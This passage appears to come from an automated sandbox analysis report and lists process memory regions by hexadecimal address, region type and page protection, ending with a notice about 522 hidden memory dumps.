page execute and read and write
|
||
20C0000
|
unkown
|
page readonly
|
||
160000
|
heap private
|
page read and write
|
||
28E000
|
heap default
|
page read and write
|
||
2EA0000
|
unkown
|
page read and write
|
||
617000
|
heap default
|
page read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
B90000
|
heap private
|
page read and write
|
||
2E5E000
|
stack
|
page read and write
|
||
1EF000
|
unkown
|
page execute and read and write
|
||
2C6D000
|
stack
|
page read and write
|
||
240000
|
unkown
|
page readonly
|
||
2F40000
|
unkown
|
page readonly
|
||
2F4E000
|
unkown
|
page read and write
|
||
270000
|
unkown
|
page read and write
|
||
315F000
|
unkown
|
page read and write
|
||
69D000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page readonly
|
||
318D000
|
unkown
|
page read and write
|
||
1E60000
|
heap private
|
page read and write
|
||
1B7F0000
|
unkown
|
page write copy
|
||
7FF00160000
|
unkown
|
page read and write
|
||
2CBC000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
1FDA000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
221F000
|
unkown
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
36E000
|
unkown
|
page read and write
|
||
1B8DB000
|
unkown
|
page readonly
|
||
3D0000
|
heap default
|
page read and write
|
||
2EB5000
|
unkown
|
page read and write
|
||
57E000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
277000
|
heap private
|
page read and write
|
||
35C1000
|
unkown
|
page read and write
|
||
2EF0000
|
unkown
|
page read and write
|
||
291F000
|
unkown
|
page read and write
|
||
2000000
|
heap private
|
page read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
2A10000
|
heap private
|
page read and write
|
||
2CFE000
|
stack
|
page read and write
|
||
BB2000
|
heap private
|
page read and write
|
||
357F000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
3142000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
1E10000
|
unkown
|
page readonly
|
||
2920000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
12C9C000
|
unkown
|
page read and write
|
||
4AD000
|
heap default
|
page read and write
|
||
2820000
|
unkown
|
page readonly
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page readonly
|
||
407000
|
heap default
|
page read and write
|
||
1B8B0000
|
unkown
|
page readonly
|
||
1B900000
|
unkown
|
page readonly
|
||
140000
|
unkown
|
page read and write
|
||
3DE000
|
stack
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
3004000
|
unkown
|
page read and write
|
||
4D8000
|
heap default
|
page read and write
|
||
494000
|
heap default
|
page read and write
|
||
35B1000
|
unkown
|
page read and write
|
||
CA000
|
stack
|
page read and write
|
||
1FF0000
|
heap private
|
page execute and read and write
|
||
7FF001B0000
|
unkown
|
page read and write
|
||
41F000
|
unkown
|
page read and write
|
||
2D9E000
|
stack
|
page read and write
|
||
257000
|
heap default
|
page read and write
|
||
301A000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
2F80000
|
unkown
|
page read and write
|
||
5D7000
|
heap default
|
page read and write
|
||
1CB000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
404000
|
heap private
|
page read and write
|
||
1E70000
|
unkown
|
page readonly
|
||
23A0000
|
heap private
|
page read and write
|
||
250000
|
unkown
|
page read and write
|
||
477000
|
heap default
|
page read and write
|
||
3F7000
|
heap default
|
page read and write
|
||
6CD000
|
stack
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
400000
|
heap private
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
2F9A000
|
unkown
|
page read and write
|
||
1C94000
|
heap private
|
page read and write
|
||
476000
|
unkown
|
page read and write
|
||
1B3F1000
|
unkown
|
page read and write
|
||
24A0000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
1AD0000
|
unkown
|
page readonly
|
||
1B3C2000
|
unkown
|
page read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1C823000
|
heap private
|
page read and write
|
||
1CC0E000
|
unkown
|
page read and write
|
||
438000
|
heap private
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
7FF00030000
|
unkown
|
page read and write
|
||
281E000
|
stack
|
page read and write
|
||
1CB7000
|
unkown
|
page readonly
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2350000
|
heap private
|
page read and write
|
||
422000
|
heap private
|
page read and write
|
||
296D000
|
unkown
|
page read and write
|
||
3B0000
|
heap default
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
1D80000
|
unkown
|
page write copy
|
||
1E64000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1F30000
|
unkown
|
page read and write
|
||
508000
|
heap default
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
2FF2000
|
unkown
|
page read and write
|
||
3E0000
|
heap default
|
page read and write
|
||
2956000
|
unkown
|
page read and write
|
||
31A6000
|
unkown
|
page read and write
|
||
150000
|
heap private
|
page read and write
|
||
53E000
|
unkown
|
page read and write
|
||
270000
|
heap private
|
page read and write
|
||
2090000
|
unkown
|
page read and write
|
||
1EB000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page readonly
|
||
320000
|
unkown
|
page readonly
|
||
301D000
|
unkown
|
page read and write
|
||
3582000
|
unkown
|
page read and write
|
||
2FCE000
|
unkown
|
page read and write
|
||
1BC3E000
|
unkown
|
page read and write
|
||
230000
|
heap private
|
page read and write
|
||
AB000
|
unkown
|
page read and write
|
||
2C71000
|
unkown
|
page read and write
|
||
311E000
|
unkown
|
page read and write
|
||
2BFF000
|
unkown
|
page read and write
|
||
430000
|
heap private
|
page read and write
|
||
24D0000
|
unkown
|
page readonly
|
||
2C6F000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page readonly
|
||
2ED7000
|
unkown
|
page read and write
|
||
154000
|
heap private
|
page read and write
|
||
31C0000
|
unkown
|
page read and write
|
||
356F000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
1B70000
|
unkown
|
page read and write
|
||
520000
|
heap private
|
page read and write
|
||
4E1000
|
heap default
|
page read and write
|
||
1FFA000
|
heap private
|
page execute and read and write
|
||
2EB1000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page readonly
|
||
2F52000
|
unkown
|
page read and write
|
||
540000
|
unkown
|
page readonly
|
||
2F5A000
|
unkown
|
page read and write
|
||
570000
|
unkown
|
page readonly
|
||
1F20000
|
unkown
|
page readonly
|
||
1DE0000
|
unkown
|
page read and write
|
||
1E80000
|
heap private
|
page execute and read and write
|
||
2234000
|
unkown
|
page read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
33C5000
|
unkown
|
page read and write
|
||
1FF7000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
430000
|
heap private
|
page read and write
|
||
6C0000
|
unkown
|
page readonly
|
||
3AE000
|
stack
|
page read and write
|
||
1F34000
|
unkown
|
page read and write
|
||
216000
|
unkown
|
page read and write
|
||
1BA90000
|
heap private
|
page read and write
|
||
3B0000
|
unkown
|
page readonly
|
||
27AE000
|
unkown
|
page read and write
|
||
2E0000
|
heap default
|
page read and write
|
||
12DE1000
|
unkown
|
page read and write
|
||
2EAE000
|
unkown
|
page read and write
|
||
359B000
|
unkown
|
page read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
260000
|
unkown
|
page read and write
|
||
2E0000
|
heap private
|
page read and write
|
||
1E50000
|
unkown
|
page readonly
|
||
322D000
|
unkown
|
page read and write
|
||
2EF3000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
31C3000
|
unkown
|
page read and write
|
||
5A0000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1BB30000
|
heap private
|
page read and write
|
||
A10000
|
unkown
|
page read and write
|
||
B8F000
|
stack
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
10000000
|
unkown
|
page execute and read and write
|
||
2F67000
|
unkown
|
page read and write
|
||
A10000
|
unkown
|
page readonly
|
||
590000
|
unkown
|
page readonly
|
||
35AE000
|
unkown
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1B3DA000
|
unkown
|
page read and write
|
||
2D9E000
|
stack
|
page read and write
|
||
2ED1000
|
unkown
|
page read and write
|
||
489000
|
heap default
|
page read and write
|
||
2570000
|
unkown
|
page readonly
|
||
42E000
|
unkown
|
page read and write
|
||
2FCA000
|
unkown
|
page read and write
|
||
2ECE000
|
unkown
|
page read and write
|
||
2FEC000
|
unkown
|
page read and write
|
||
356C000
|
unkown
|
page read and write
|
||
362F000
|
unkown
|
page read and write
|
||
222000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
2F9D000
|
unkown
|
page read and write
|
||
2B90000
|
unkown
|
page write copy
|
||
2C6E000
|
unkown
|
page read and write | page guard
|
||
250000
|
heap default
|
page read and write
|
||
454000
|
heap default
|
page read and write
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
4ED000
|
heap default
|
page read and write
|
||
16B000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
12D81000
|
unkown
|
page read and write
|
||
6D0000
|
heap private
|
page read and write
|
||
3000000
|
unkown
|
page read and write
|
||
340000
|
unkown
|
page readonly
|
||
1F3A000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
494000
|
heap default
|
page read and write
|
||
3248000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page read and write
|
||
610000
|
heap private
|
page read and write
|
||
C1D000
|
stack
|
page read and write
|
||
290000
|
unkown
|
page readonly
|
||
7FF001F7000
|
unkown
|
page read and write
|
||
3AEA000
|
unkown
|
page read and write
|
||
5C0000
|
unkown
|
page readonly
|
||
2FB8000
|
unkown
|
page read and write
|
||
2DEE000
|
stack
|
page read and write
|
||
1FD5000
|
unkown
|
page read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
20DB000
|
heap private
|
page read and write
|
||
4DE000
|
heap default
|
page read and write
|
||
580000
|
heap private
|
page read and write
|
||
2B7000
|
heap default
|
page read and write
|
||
7FF001E0000
|
unkown
|
page execute and read and write
|
||
3470000
|
unkown
|
page read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
7FF00122000
|
unkown
|
page execute and read and write
|
||
7FF00190000
|
unkown
|
page read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
5EE000
|
unkown
|
page read and write
|
||
2080000
|
unkown
|
page readonly
|
||
23F0000
|
unkown
|
page readonly
|
||
470000
|
heap default
|
page read and write
|
||
3146000
|
unkown
|
page read and write
|
||
1BA6000
|
unkown
|
page read and write
|
||
35C4000
|
unkown
|
page read and write
|
||
7FF0002A000
|
unkown
|
page execute and read and write
|
||
35E000
|
heap default
|
page read and write
|
||
2A0000
|
heap private
|
page read and write
|
||
3572000
|
unkown
|
page read and write
|
||
1B8BC000
|
unkown
|
page readonly
|
||
435000
|
heap default
|
page read and write
|
||
61E000
|
unkown
|
page read and write
|
||
12C71000
|
unkown
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
2920000
|
unkown
|
page read and write
|
||
2CA6000
|
unkown
|
page read and write
|
||
23E0000
|
unkown
|
page read and write
|
||
1CA0D000
|
unkown
|
page read and write
|
||
2030000
|
heap private
|
page execute and read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
2F74000
|
unkown
|
page read and write
|
||
53A000
|
heap default
|
page read and write
|
||
305F000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page write copy
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
1FD0000
|
unkown
|
page read and write
|
||
28F0000
|
heap private
|
page read and write
|
||
2D50000
|
heap private
|
page read and write
|
||
1C7AE000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
1E10000
|
unkown
|
page readonly
|
||
186000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
510000
|
heap default
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
2EE000
|
heap default
|
page read and write
|
||
23A4000
|
heap private
|
page read and write
|
||
1B4FD000
|
unkown
|
page read and write
|
||
643000
|
heap default
|
page read and write
|
||
2FC1000
|
unkown
|
page read and write
|
||
7FF00270000
|
unkown
|
page read and write
|
||
477000
|
heap default
|
page read and write
|
||
1C810000
|
heap private
|
page read and write
|
||
2FA3000
|
unkown
|
page read and write
|
||
239E000
|
unkown
|
page read and write
|
||
B94000
|
heap private
|
page read and write
|
||
35AB000
|
unkown
|
page read and write
|
||
2FA8000
|
unkown
|
page read and write
|
||
2A0000
|
heap default
|
page read and write
|
||
7FF00220000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
394000
|
heap default
|
page read and write
|
||
260000
|
heap private
|
page read and write
|
||
16C000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1FF7000
|
unkown
|
page readonly
|
||
2CF000
|
stack
|
page read and write
|
||
1B3A9000
|
unkown
|
page read and write
|
||
24EF000
|
unkown
|
page read and write
|
||
428000
|
heap default
|
page read and write
|
||
7FF000E0000
|
unkown
|
page read and write
|
||
2D5E000
|
unkown
|
page read and write
|
||
2F30000
|
heap private
|
page read and write
|
||
2D8F000
|
stack
|
page read and write
|
||
39F1000
|
unkown
|
page read and write
|
||
6A0000
|
heap private
|
page read and write
|
||
1B8B7000
|
unkown
|
page readonly
|
||
20A0000
|
heap private
|
page read and write
|
||
29F000
|
stack
|
page read and write
|
||
2CAE000
|
stack
|
page read and write
|
||
1EA000
|
stack
|
page read and write
|
||
3A04000
|
unkown
|
page read and write
|
||
2AA0000
|
unkown
|
page read and write
|
||
33BB000
|
unkown
|
page read and write
|
||
3014000
|
unkown
|
page read and write
|
||
2CA0000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
2920000
|
unkown
|
page read and write
|
||
3020000
|
unkown
|
page read and write
|
||
4EA000
|
heap default
|
page read and write
|
||
264000
|
heap private
|
page read and write
|
||
1E10000
|
unkown
|
page readonly
|
||
5A7000
|
heap default
|
page read and write
|
||
4D6000
|
heap default
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
1B3BC000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
5DD000
|
heap default
|
page read and write
|
||
7FF001D0000
|
unkown
|
page read and write
|
||
1CB00000
|
heap private
|
page read and write
|
||
241E000
|
unkown
|
page read and write
|
||
7FF001A0000
|
unkown
|
page execute and read and write
|
||
3026000
|
unkown
|
page read and write
|
||
2360000
|
heap private
|
page read and write
|
||
3C0000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
120000
|
unkown
|
page readonly
|
||
2920000
|
unkown
|
page read and write
|
||
3F4000
|
heap default
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
34F7000
|
unkown
|
page read and write
|
||
12F22000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
245C000
|
unkown
|
page read and write
|
||
37E000
|
unkown
|
page read and write
|
||
2C4E000
|
stack
|
page read and write
|
||
2A0000
|
unkown
|
page readonly
|
||
1D5000
|
unkown
|
page read and write | page guard
|
||
2920000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
2F84000
|
unkown
|
page read and write
|
||
1E0000
|
unkown
|
page read and write
|
||
1E00000
|
unkown
|
page read and write
|
||
7FF00280000
|
unkown
|
page execute and read and write
|
||
2920000
|
unkown
|
page read and write
|
||
2ED4000
|
unkown
|
page read and write
|
||
53C000
|
heap default
|
page read and write
|
||
2FAC000
|
unkown
|
page read and write
|
||
20A5000
|
heap private
|
page read and write
|
||
1E30000
|
unkown
|
page readonly
|
||
7FF00250000
|
unkown
|
page execute and read and write
|
||
2920000
|
unkown
|
page read and write
|
||
350000
|
heap default
|
page read and write
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
60000
|
unkown
|
page readonly
|
||
1CA0000
|
unkown
|
page readonly
|
||
4A7000
|
heap default
|
page read and write
|
||
7FF000F5000
|
unkown
|
page read and write
|
||
23A000
|
stack
|
page read and write
|
||
3534000
|
unkown
|
page read and write
|
||
3AF0000
|
unkown
|
page read and write
|
||
3585000
|
unkown
|
page read and write
|
||
530000
|
unkown
|
page readonly
|
||
2A9F000
|
unkown
|
page read and write
|
||
630000
|
heap private
|
page read and write
|
||
434000
|
heap private
|
page read and write
|
||
1ACD0000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
3592000
|
unkown
|
page read and write
|
||
1FBD000
|
unkown
|
page read and write
|
||
2F63000
|
unkown
|
page read and write
|
||
3E0000
|
unkown
|
page readonly
|
||
2382000
|
heap private
|
page read and write
|
||
23BE000
|
unkown
|
page read and write
|
||
27B0000
|
unkown
|
page readonly
|
||
2920000
|
unkown
|
page read and write
|
||
3598000
|
unkown
|
page read and write
|
||
5C4000
|
heap default
|
page read and write
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
7FF00022000
|
unkown
|
page execute and read and write
|
||
3693000
|
unkown
|
page read and write
|
||
526000
|
heap default
|
page read and write
|
||
3033000
|
unkown
|
page read and write
|
||
CB0000
|
heap private
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
7FF000E2000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
2F94000
|
unkown
|
page read and write
|
||
22D0000
|
unkown
|
page readonly
|
||
4AD000
|
heap default
|
page read and write
|
||
23D0000
|
unkown
|
page read and write
|
||
1C0000
|
heap private
|
page read and write
|
||
2F0D000
|
unkown
|
page read and write
|
||
2B0000
|
heap default
|
page read and write
|
There are 522 hidden memdumps, click here to show them.